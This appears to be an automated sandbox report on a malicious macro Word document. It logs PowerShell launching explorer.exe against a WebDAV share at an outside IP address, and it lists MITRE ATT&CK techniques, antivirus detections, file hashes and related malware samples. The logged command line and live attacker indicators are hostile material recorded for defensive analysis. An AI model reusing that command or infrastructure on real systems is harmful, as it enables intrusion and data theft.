Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe -- Network Connect: 89.23.98.98 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\89.23.98.98@80\file\
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Progmanlbusn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation (4 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\explorer.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: %ProgramFiles%\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: \\89.23.98.98@80\file\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: \\89.23.98.98@80\fil
Source: C:\Windows\explorer.exe -- File opened: \\89.23.98.98@80\file
MITRE ATT&CK matrix, listed per tactic. The number in parentheses is the count the report attaches to a matched technique; techniques without a number are the matrix's unmatched cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Scripting (22); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (11); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scripting (22); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (112); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (112); DLL Side-Loading (1); Software Packing; Steganography; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Network Share Discovery (1); Security Software Discovery (1); Process Discovery (2); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (Source | Detection | Scanner | Label)

Submitted sample:
Ham9SAD0Ou.doc | 42% | ReversingLabs | Script-Macro.Trojan.Heuristic
Ham9SAD0Ou.doc | 100% | Avira | HEUR/Macro.Agent
Ham9SAD0Ou.doc | 100% | Joe Sandbox ML

Dropped file:
C:\Users\user\Desktop\~WRD0000.tmp | 100% | Avira | HEUR/Macro.Downloader.MRSY.Gen
C:\Users\user\Desktop\~WRD0000.tmp | 100% | Joe Sandbox ML

No Antivirus matches
No Antivirus matches

URLs:
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://support.mozilla.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://java.sun.com | explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com | explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000002.00000002.382279546.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.piriform.com/ccleanerm | explorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://89.23.98.98/ | explorer.exe, 00000004.00000002.380623964.000000000020B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.380623964.00000000001FC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.piriform.com/cc | explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.389315931.0000000012B61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleaner | explorer.exe, 00000005.00000002.1091711614.000000000034A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1092394208.00000000062B0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.1091885223.0000000002600000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.autoitscript.com/autoit3 | explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org | explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerv | explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.385717407.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
89.23.98.98 | unknown | Russian Federation | | 48687 | MAXITEL-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540325
Start date and time: 2024-10-23 17:29:45 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ham9SAD0Ou.doc
renamed because original name is a hash value
Original Sample Name: 6005516d783bde80a25763acbb85230b.docx.doc
Detection: MAL
Classification: mal100.spyw.expl.evad.winDOC@6/15@0/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 1
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Override analysis time to 240s for sample based on specific behavior
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target powershell.exe, PID 3496 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Ham9SAD0Ou.doc
Time | Type | Description
11:30:47 | API Interceptor | 42x Sleep call for process: powershell.exe modified
11:30:48 | API Interceptor | 6809x Sleep call for process: explorer.exe modified
                    No context
                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
MAXITEL-ASRU | file.dll | Get hash | malicious | Matanbuchus | Browse | 89.23.113.220
MAXITEL-ASRU | file.dll | Get hash | malicious | Matanbuchus | Browse | 89.23.113.220
MAXITEL-ASRU | zufmUwylvo.exe | Get hash | malicious | Flesh Stealer, Xmrig | Browse | 89.23.100.233
MAXITEL-ASRU | System.exe | Get hash | malicious | Flesh Stealer, Xmrig | Browse | 89.23.100.233
MAXITEL-ASRU | SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exe | Get hash | malicious | Unknown | Browse | 89.23.100.233
MAXITEL-ASRU | tjigfd64.exe | Get hash | malicious | LummaC Stealer | Browse | 94.158.209.5
MAXITEL-ASRU | 3plugin29563.exe | Get hash | malicious | Amadey | Browse | 89.23.103.42
MAXITEL-ASRU | setup.exe | Get hash | malicious | RedLine | Browse | 89.23.97.185
MAXITEL-ASRU | http://go.tenoaksadvisors.com. | Get hash | malicious | Unknown | Browse | 89.23.110.52
MAXITEL-ASRU | TYg9Jx5SUa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 89.23.100.125
                    No context
                    No context
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):0.34726597513537405
                    Encrypted:false
                    SSDEEP:3:Nlll:Nll
                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:@...e...........................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):22016
                    Entropy (8bit):4.564975800158306
                    Encrypted:false
                    SSDEEP:192:+nt6B8WjSCtCHu+xhJJmkNCaot6f8QdktCHu+xhJJmkNCa:StpePtKxhLlNotjQetKxhLlN
                    MD5:2856431DDB994D0CD47ED88569B76D1C
                    SHA1:351D9BE0E261202C8363763339EBEC47FA250C17
                    SHA-256:96BBF4C4C28C0363DE4FDFD6258BDB0FAF52D391C1AF8ACD3756FAA407DEADB0
                    SHA-512:D17B1F5079D7CF427C3B0042587B494D8C9B865445BAC9E824188BB2CF75EA2F8D24D1FB64BE45341C4470ACA7DF9DB23C7E4E09308BA92C30DBB972E1D7FE04
                    Malicious:false
                    Reputation:low
                    Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'...............)........................... ...!..."...#...$...%...&...(...............................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Oct 23 14:30:43 2024, length=15661, window=hide
                    Category:dropped
                    Size (bytes):1014
                    Entropy (8bit):4.53058406315058
                    Encrypted:false
                    SSDEEP:12:83gYFgXg/XAlCPCHaXIBPB/Dr8xX+W6csOQoCicvbQBnGloiDtZ3YilMMEpxRljI:83g8/XTY9xO8hoJeMB0oiDv3q/57u
                    MD5:10522B941D688AE1D25B0C385E52A41B
                    SHA1:3BE8783A1289D9A30CEA65920ED84D432DB38D73
                    SHA-256:A46589A18A0A4158A21E1A76B736BFEA37FFC8B6BCC4A8151D2499A059B4A633
                    SHA-512:3018E3999269FBB6696D1089F96DCD91EC90B1BEADC71B4EBDC9719F87594598E1113A22261E63B977C100D2C1DCB35FCB5B5791BA2718008B51EA5B92B95C57
                    Malicious:false
                    Preview:L..................F.... .....=.r.....=.r.......`%..-=...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....WY.{..user.8......QK.XWY.{*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.-=..WY.{ .HAM9SA~1.DOC..J.......WC..WC.*.........................H.a.m.9.S.A.D.0.O.u...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop\Ham9SAD0Ou.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.H.a.m.9.S.A.D.0.O.u...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......888683..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Generic INItialization configuration [folders]
                    Category:dropped
                    Size (bytes):54
                    Entropy (8bit):4.643776391052359
                    Encrypted:false
                    SSDEEP:3:M12Ic2oAeFFom4Oh2oAeFFov:MEIc2oAMFNh2oAMFy
                    MD5:17EDF2DF72D278B01A81667305F2902F
                    SHA1:CE069F8F7C82DF91FFF35FC150CBA46135F5771E
                    SHA-256:650C8200B5A30588CF167C67E120A2FB92654192E3E2669F508A1C2B2A41A445
                    SHA-512:78C978E292D9486194CC7F438ED91677D1915FC3923B7B424C79A9FB709BFA4E5049B5BF1B519D8114397D7022851DB853C3A08BA89C61747ED3249FBE27D080
                    Malicious:false
                    Preview:[doc]..Ham9SAD0Ou.LNK=0..[folders]..Ham9SAD0Ou.LNK=0..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6045
                    Entropy (8bit):3.58242373319027
                    Encrypted:false
                    SSDEEP:96:HvhQCwO4IYqvsqvJCwo5etz5/RHWipz5/RHyic:HvWko5etRYipRMic
                    MD5:35F273A66F3E4B45906C8BBCB389B0F2
                    SHA1:E69A7D327806899048DEE8682B4B9FD29E0739F5
                    SHA-256:5E8FE7386E95D3AFC64497D80C04E677B4E324CE304E2F2F5D344C9ACB349460
                    SHA-512:D382C18EF25CB1F94A0CBA43FF0ABFB4DD1023D7EE02F82B4AB825E884455A1DB39962BC0FDF5D25796E50E722E0D5418AE7A1D7D4D25340CD093E94CBA19E85
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....WY.{. PROGRA~3..D.......:..WY.{*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6045
                    Entropy (8bit):3.58242373319027
                    Encrypted:false
                    SSDEEP:96:HvhQCwO4IYqvsqvJCwo5etz5/RHWipz5/RHyic:HvWko5etRYipRMic
                    MD5:35F273A66F3E4B45906C8BBCB389B0F2
                    SHA1:E69A7D327806899048DEE8682B4B9FD29E0739F5
                    SHA-256:5E8FE7386E95D3AFC64497D80C04E677B4E324CE304E2F2F5D344C9ACB349460
                    SHA-512:D382C18EF25CB1F94A0CBA43FF0ABFB4DD1023D7EE02F82B4AB825E884455A1DB39962BC0FDF5D25796E50E722E0D5418AE7A1D7D4D25340CD093E94CBA19E85
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1.....WY.{. PROGRA~3..D.......:..WY.{*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Microsoft Word 2007+
                    Category:dropped
                    Size (bytes):27360
                    Entropy (8bit):7.681713309453544
                    Encrypted:false
                    SSDEEP:384:3eRhBGhv+EhnsZLmMKKmoeqPR/Mf5ORMCYGS9lFePjyibvzSykSli:uREvrhnsZLCpqJ9MCvSFyIyfli
                    MD5:14B6092DB16864060DD81FCA9D30C3A7
                    SHA1:126FD65FB389453250930DBAAF5AF8AD653E3A1D
                    SHA-256:C78770AF0068E84B48E1314382DD54ADD2BD5DFBBA43C1D9E4B790A6816B2DD7
                    SHA-512:93018D93DEA01037B226BC4CF3F79A21B51D1EC8564E51DC1819F1D35A365DF73835A0C596F7F8EFF7F5C170D63AE41B7C6939EEB109862C5DFAC0DD082AF329
                    Malicious:true
                    Preview:PK..........!...E.....#.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.....(...../..B...BY.6e.D...x..g/......`.|.2p.k.f...\.',K(...wP.%$v6...N..RFh..6G..B$5.+.....>Z...g"H.(g ...c..Cp.c..F..(.S.....['S.Xv....&C...HF..inS...(........2..,B.z.>[.;....b..........f........FF......>j..z.........p....p+U.c'......qon7.R..$.o.v.^......_.....u.!z.).8...;.......b.'4MM_[...~5@${..|.....3Lo.....^#%=.I=....+.^.H!......GC.M....'$.......F.4..".XE..R.D.u}PG...F[4.?z.......PK......
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Microsoft Word 2007+
                    Category:dropped
                    Size (bytes):27360
                    Entropy (8bit):7.681713309453544
                    Encrypted:false
                    SSDEEP:384:3eRhBGhv+EhnsZLmMKKmoeqPR/Mf5ORMCYGS9lFePjyibvzSykSli:uREvrhnsZLCpqJ9MCvSFyIyfli
                    MD5:14B6092DB16864060DD81FCA9D30C3A7
                    SHA1:126FD65FB389453250930DBAAF5AF8AD653E3A1D
                    SHA-256:C78770AF0068E84B48E1314382DD54ADD2BD5DFBBA43C1D9E4B790A6816B2DD7
                    SHA-512:93018D93DEA01037B226BC4CF3F79A21B51D1EC8564E51DC1819F1D35A365DF73835A0C596F7F8EFF7F5C170D63AE41B7C6939EEB109862C5DFAC0DD082AF329
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:PK..........!...E.....#.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.....(...../..B...BY.6e.D...x..g/......`.|.2p.k.f...\.',K(...wP.%$v6...N..RFh..6G..B$5.+.....>Z...g"H.(g ...c..Cp.c..F..(.S.....['S.Xv....&C...HF..inS...(........2..,B.z.>[.;....b..........f........FF......>j..z.........p....p+U.c'......qon7.R..$.o.v.^......_.....u.!z.).8...;.......b.'4MM_[...~5@${..|.....3Lo.....^#%=.I=....+.^.H!......GC.M....'$.......F.4..".XE..R.D.u}PG...F[4.?z.......PK......
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:Microsoft Word 2007+
                    Entropy (8bit):7.393700777109046
                    TrID:
                    • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
                    • Word Microsoft Office Open XML Format document (49504/1) 36.13%
                    • Word Microsoft Office Open XML Format document (27504/1) 20.07%
                    • ZIP compressed archive (8000/1) 5.84%
                    File name:Ham9SAD0Ou.doc
                    File size:16'687 bytes
                    MD5:6005516d783bde80a25763acbb85230b
                    SHA1:e7a231af0530a09066717d3c1fcd340e215e83d9
                    SHA256:edfc124678400137fbe36333ef1114ebd69dd7448f88c02eb68825a3392773fc
